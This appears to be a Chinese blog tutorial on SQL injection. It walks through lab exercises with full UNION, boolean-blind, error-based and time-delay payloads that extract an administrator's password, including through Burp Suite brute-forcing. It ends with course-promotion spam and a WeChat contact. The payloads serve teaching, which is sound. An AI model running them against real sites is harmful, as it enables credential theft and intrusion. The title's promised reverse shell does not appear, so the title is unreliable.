SQL注入一文全解----包括Sqlmap的利用，利用mysql写reverseshell_and 1=cast((select username from users) as int)--

1. '+UNION+SELECT+tablename,NULL+FROM+informationschema.tables–

2. 查到users_yxcapd 可能包含username or passwd informations

3. 查询列名字

4. ‘+UNION+SELECT+columnname,NULL+FROM+informationschema.columns+where+tablename='usersyxcapd’–

5. 得到 passworduuqjjs and usernamefrlczf two columns name

6. 查询内容

7. '+UNION+SELECT+passworduuqjjs,usernamefrlczf+FROM+users_yxcapd–

• 基于响应的盲注手动测试

注意引号的闭合

1. 注入点判断

2. TrackingId=xyz’ AND ‘1’='1

3. TrackingId=xyz’ AND ‘1’='2

4. 判断是否存在users表

5. TrackingId=xyz’ AND (SELECT ‘a’ FROM users LIMIT 1)='a

6. SELECT ‘a’ FROM users 这一部分表示 返回’a’ 常量 ，若users存在，则返回a 。 若不存在则页面出错。（测试时使用的网页表现为若正常则返回welcome ，否则没有welcome）

7. limit 1 表示 无论有多少数据 只返回第一行 ，不对列进行操作

8. 即：只有users表存在的时候 ，逻辑关系是 ‘a’='a’成立，才会返回welcom。

9. 判断是否存在administrator用户

10. TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’)='a

11. SELECT ‘a’ FROM users 这一部分恒真

12. WHERE username=‘administrator’ 若存在则真 逻辑关系’a’='a’才成立返回welcome。

13. 判断administrator的密码长度

14. TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>1)='a

15. SELECT ‘a’ FROM users 恒真

16. WHERE username=‘administrator’ 恒真

17. LENGTH(password)>1) 模糊测试 若密码长度大于1则为真，逻辑关系’a’='a’成立。返回welcome

18. 继续判断

19. TrackingId=xyz’ AND (SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>3)='a 不断修改password>i (i∈1 2 3 4 ……)

20. 确定密码长度后确定密码每个位置的字符

21. TrackingId=xyz’ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=‘administrator’)='a

22. SELECT SUBSTRING(password,1,1) substring为子串函数，表示password的第1个字符匹配1位 。

23. 通过不断修改substring(password,2,1) 的数值，来逐个判断出每个字符串的具体字符。

24. burpsuite添加字符逐个爆破

25. TrackingId=xyz’ AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username=‘administrator’)='§a§

26. 思路------通过修改substring(password,i,1) i处的数值，来判断是否等于最后结尾处的§a§

27. §a§ 的范围设置在a-z，0-9之间

28. 即: substring(password,i,1) 当i等于1时,表示 密码中的第一位字符 去匹配a-z,1-9 看看是否界面返回了welcome–这一功能我们可以在inthder模块中的grep 匹配中设置我们需要匹配的字符来实现。适用情况:SQL查询的结果不返回，也不显示错误信息。但如果查询返回任何行，应用程序会在页面中包含一条“欢迎回来”消息。

• 基于错误的盲注手动测试

1. 判断是否存在注入点
2. TrackingId=xyz**'**
3. 加 ’ 查看是否报错
4. 再次判断
5. TrackingId=xyz**‘’**
6. 加双 单引号 查看错误是否消失
7. 若消失则可以说明 ’ 产生了作用,表明语法错误（在本例中为未闭合的引号）对响应产生了可检测到的影响
8. 尝试
9. TrackingId=xyz’||(SELECT ’ ')||’ 其中 ||为字符串拼接 相当于在后面拼接了一个空白,不产生任何作用
10. 上述发生报错,说明,数据库不支持该格式,修改
11. TrackingId=xyz’||(SELECT ‘’ FROM dual)||’ dual表是Oracle特有的表 .响应无报错 说明该数据库为Oracle
12. 这要求所有SELECT语句显式指定表名-----Oracle特有
13. 在判断完数据库后,验证是否确实存在注入
14. TrackingId=xyz’||(SELECT ‘’ FROM not-a-real-table)||’ 其中 not-a-real-table是一个不存在的表
15. 上述出现报错. 此行为强烈表明后端正在将注入作为 SQL 查询进行处理。
16. 判断表名
17. TrackingId=xyz’||(SELECT ‘’ FROM users WHERE ROWNUM = 1)||’ 查看users表是否存在
18. 若没有返回错误,这说明该表确实存在
19. 其中 rownum函数 相当于 MySQL中的 limit 1 都表示返回一行. 但是在Oracle中没有limit函数。故而采用其他函数进行平替
20. 添加rownum函数的目的在于防止查询返回多于一行，这会破坏我们的串联。
21. 测试 case end 该测试条件是否可以响应
22. TrackingId=xyz’||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM dual)||’ —若响应则应报错
23. TrackingId=xyz’||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE ‘’ END FROM dual)||’ —修改判断条件，报错消失。表明可以根据特定条件的真实性有条件地触发错误
24. 判断administrator用户是否存在
25. TrackingId=xyz’||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ —若存在则报错
26. 判断密码长度
27. TrackingId=xyz’||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
28. burpsuite 判断字符
29. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,1,1)=‘a’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
30. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,1,1)=‘§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’
31. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ —修改数值判断…….
32. TrackingId=xyz’||(SELECT CASE WHEN SUBSTR(password,§2§,1)='§a§’ THEN TO_CHAR(1/0) ELSE ‘’ END FROM users WHERE username=‘administrator’)||’ ****把两处都添加为变量进行破解
33. 第一处为1-20 从密码长度得出。
34. 第二处改为a-z 0-9 A-Z

• 基于可见错误的盲注手动测试

1. 判断是否存在注入点
2. TrackingId=ogAZZfxtOKUELbuJ’ 是否出现错误
3. TrackingId=ogAZZfxtOKUELbuJ’’ 错误是否消失
4. 判断TrackingId=ogAZZfxtOKUELbuJ’-- 错误是否消失 这里说明注释起到了作用 —这里出现了报错信息的回显，表明可以利用报错注入
5. 构造报错语句
6. ’ AND CAST((SELECT 1) AS int)-- 这里的cast()函数可以修改数据的数据类型
7. 即: 把 1 转化为整数类型 运行后发现报错([ERROR: argument of AND must be type boolean, not type integer](ERROR: argument of AND must be type boolean, not type integer)) 根据报错可知 and 后面必须是一个布尔型的数据类型
8. 根据报错进行构造
9. ’ AND **1=**CAST((SELECT 1) AS int)-- 报错消失,说明构造的语句发挥了作用
10. ’ AND 1=CAST((SELECT username FROM users) AS int)-- 再次进行构造,尝试获取username —出现报错
11. 报错信息(Unterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = ‘fOPoniV9hYwm4fZ3’ AND 1=CAST((SELECT username FROM users) AS’. Expected char)
12. 这说明字符数过于多,尝试删除cookie来空出字符
13. TrackingId=’ AND 1=CAST((SELECT username FROM users) AS int)-- 报错信息变更,说明更改产生了作用
14. 报错信息([ERROR: more than one row returned by a subquery used as an expression](ERROR: more than one row returned by a subquery used as an expression)) 这表明返回不仅一行
15. TrackingId=’ AND 1=CAST((SELECT username FROM users limit 1) AS int)-- —再次进行构造,限制返回行数
16. 出现错误信息([ERROR: invalid input syntax for type integer: “administrator”](ERROR: invalid input syntax for type integer: “administrator”)) —这返回了第一个用户administrator
17. 即:泄漏了表中的第一个用户名
18. 获取密码
19. ’ AND 1=CAST((SELECT password FROM users limit 1) AS int)-- —构造语句获取密码
20. 报错信息([ERROR: invalid input syntax for type integer: “q9c7x6xcdn34bcazv2jd”](ERROR: invalid input syntax for type integer: “q9c7x6xcdn34bcazv2jd”))

• 带有时间延迟和信息检索的盲注手动测试

1. 判断是否存在时间盲注
2. trackingId=x’ ; SELECT+CASE+WHEN+(1=1)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END–
3. 若存在时间盲注则该响应会等待十秒才会响应
4. TrackingId=x’%3BSELECT+CASE+WHEN+(1=2)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END-- 验证是否是因为语句延迟（排除网络因素）
5. 判断用户名
6. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
7. 延迟存在 ， 说明存在administrator用户
8. 判断密码长度
9. TrackingId=x’%3BSELECT+CASE+WHEN+(username=‘administrator’+AND+LENGTH(password)>1)+THEN+pgsleep(10)+ELSE+pgsleep(0)+END+FROM+users–
10. 多次测试 最终确定密码长度为20

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

oid移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**